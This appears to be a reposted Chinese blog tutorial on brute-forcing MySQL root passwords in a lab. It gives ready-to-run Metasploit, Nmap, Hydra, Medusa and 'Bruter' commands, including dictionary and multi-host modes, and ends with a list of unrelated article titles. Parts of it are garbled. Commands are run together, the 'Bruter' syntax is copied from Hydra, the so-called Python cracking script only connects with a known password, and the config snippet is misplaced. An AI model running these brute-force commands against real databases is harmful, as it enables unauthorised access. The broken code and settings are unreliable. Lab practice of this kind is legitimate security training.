博客
关于我
MySQL口令扫描渗透测试攻略
阅读量:192 次
发布时间:2019-02-28

本文共 2320 字,大约阅读时间需要 7 分钟。

MySQL数据库渗透测试工具实践指南

在信息安全领域,MySQL数据库的安全性是一个重要的防护点。通常情况下,数据库不会提供对外连接,严格的安全设置会限制仅允许从特定IP或本机登录。然而,渗透测试的核心在于发现这些例外。为了提高渗透测试效率,本文将基于现有的主流MySQL口令扫描工具,提供实际操作场景的具体命令和步骤。


1. 测试环境

  • 操作系统:Windows 2003 Server
  • 软件组合:PHP + MySQL 5.0.90-community-nt
  • 工具:Kali Linux 2017(主流渗透工具集合)+ Windows 2003

2. 账号设置

为了允许远程访问,将 MySQL 的 host 设置为 %,并设置默认口令为 11111111

MySQL 配置文件示例my.ini):

[mysql]bind-address = *

3. 测试目标

  • 目标服务器:192.168.157.130
  • 数据库用户:root
  • 默认口令:11111111

1.1 Metasploit 扫描 MySQL 口令

Metasploit 是一款功能强大的渗透测试框架,支持多种数据库扫描模块。

启动 Metasploit 命令

在 Kali Linux 终端中运行:

msfconsole

使用 Metasploit 扫描 MySQL 口令

  • 单一模式扫描
    use auxiliary/scanner/mysql/mysql_loginset rhosts 192.168.157.130set username rootset password 11111111run
  • 字典模式扫描
    use auxiliary/scanner/mysql/mysql_loginset RHOSTS 192.168.157.130set pass_file "/root/top10000pwd.txt"set username rootrun

扫描结果将显示绿色 + 符号表示成功破解的口令,红色 - 表示未成功。


1.2 Nmap 扫描 MySQL 口令

Nmap 是一款多功能网络扫描工具,支持 MySQL 相关脚本。

####MySQL 脚本示例查看 Nmap 的 MySQL 脚本路径:

ls /usr/share/nmap/scripts/mysql*

执行扫描

  • 扫描空口令
    nmap -p 3306 --script=mysql-empty-password.nse 192.168.157.130
  • 扫描已知口令
    nmap -sV --script=mysql-databases --script-args dbuser=root,dbpass=11111111 192.168.157.130

1.3 xHydra 和 Hydra 破解 MySQL 口令

Hydra 是一款功能强大的密码暴力破解工具,支持 MySQL 协议。

使用 xHydra

  • 打开 Kali 的 xHydra 图形界面工具:
    xhydra-gtk
  • 设置目标地址和协议:
    • 目标:单一目标或 IP 段
    • 协议:选择 MySQL
  • 破解命令示例

    • 已知口令破解
      hydra -l root -p 11111111 -t 16 192.168.157.130 mysql
    • 字典模式破解
      hydra -l root -P /root/top10000pwd.txt -t 16 192.168.157.130 mysql

    1.4 Bruter 破解 MySQL 口令

    Bruter 是一款支持多种协议的暴力破解工具,简单易用。

    破解命令

    • 单一用户破解
      brute -l root -p 11111111 -t 16 192.168.157.130
    • 字典模式破解
      brute -l root -P /root/top10000pwd.txt -t 16 192.168.157.130

    1.5 Medusa 破解 MySQL 口令

    Medusa 是一款支持并行破解的高效工具,适合大规模攻击。

    破解命令

    • 字典模式破解
      medusa -M mysql -h 192.168.157.130 -e ns -F -u root -P /root/top10000pwd.txt
    • IP 段模式破解
      medusa -M mysql -H host.txt -e ns -F -u root -P /root/top10000pwd.txt

    1.6 Python 脚本破解 MySQL

    编写一个简单的 Python 脚本进行 MySQL 破解:

    import MySQLdb# 例如:破解本地数据库db = MySQLdb.connect(host="localhost", user="root", passwd="11111111")print("用户名:root,密码:11111111")db.close()

    1.7 工具总结

    • Metasploit:综合性工具,适合复杂场景。
    • Hydra/xHydra:支持多地址和字典模式破解。
    • Bruter:简单易用,适合快速验证。
    • Medusa:高效并行破解,适合大规模攻击。

    1.8 最佳实践

    • 多地址模式:如果目标是多个 IP 或子网,使用 RHOSTSH 参数。
    • 字典模式:对于长密码或复杂口令,使用字典文件加快扫描速度。
    • 并行模式:Hydra 和 Medusa 支持并行破解,提升效率。

    通过以上方法,可以有效地测试和破解 MySQL 数据库的口令。实际操作中,结合目标环境和风险评估,灵活选择最适合的工具和参数。

    转载地址:http://nfgc.baihongyu.com/

    你可能感兴趣的文章
    No toolchains found in the NDK toolchains folder for ABI with prefix: mips64el-linux-android
    查看>>
    NO.23 ZenTaoPHP目录结构
    查看>>
    no1
    查看>>
    NO32 网络层次及OSI7层模型--TCP三次握手四次断开--子网划分
    查看>>
    NoClassDefFoundError: org/springframework/boot/context/properties/ConfigurationBeanFactoryMetadata
    查看>>
    Node JS: < 一> 初识Node JS
    查看>>
    Node Sass does not yet support your current environment: Windows 64-bit with Unsupported runtime(72)
    查看>>
    node, nvm, npm,pnpm,以前简单的前端环境为什么越来越复杂
    查看>>
    Node-RED中使用JSON数据建立web网站
    查看>>
    Node-RED中使用json节点解析JSON数据
    查看>>
    Node-RED中使用node-random节点来实现随机数在折线图中显示
    查看>>
    Node-RED中使用node-red-browser-utils节点实现选择Windows操作系统中的文件并实现图片预览
    查看>>
    Node-RED中使用node-red-contrib-image-output节点实现图片预览
    查看>>
    Node-RED中使用node-red-node-ui-iframe节点实现内嵌iframe访问其他网站的效果
    查看>>
    Node-RED中使用Notification元件显示警告讯息框(温度过高提示)
    查看>>
    Node-RED中实现HTML表单提交和获取提交的内容
    查看>>
    Node-RED中建立Websocket客户端连接
    查看>>
    Node-RED中通过node-red-ui-webcam节点实现访问摄像头并截取照片预览
    查看>>
    node-request模块
    查看>>
    Node.js 8 中的 util.promisify的详解
    查看>>